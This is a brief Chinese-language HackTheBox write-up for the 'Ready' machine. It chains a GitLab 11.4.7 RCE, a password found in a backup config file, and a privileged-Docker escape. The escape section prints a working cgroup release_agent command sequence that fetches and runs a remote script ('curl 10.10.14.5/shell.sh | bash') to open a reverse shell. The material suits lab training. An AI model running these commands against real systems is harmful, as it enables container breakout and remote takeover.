Ready - HackTheBox

nmap扫描

访问5080端口

gitlab仓库，注册一个账号进去看看

发现了gitlab的版本，搜一下有无exp

https://github.com/Algafix/gitlab-RCE-11.4.7

有个rce，尝试利用

提权

在/opt/backup/gitlab.rb文件中发现密码

尝试切换可登陆的用户

最终root用户成功登录

但在root目录下没有flag文件，而且没有计划任务

貌似是在docker容器内

看下docker是否为特权启动

权限为特权

docker逃逸，依次执行

d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.14.5/shell.sh | bash' >/c;
chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";

在本地新建一个反弹shell的sh文件

成功逃逸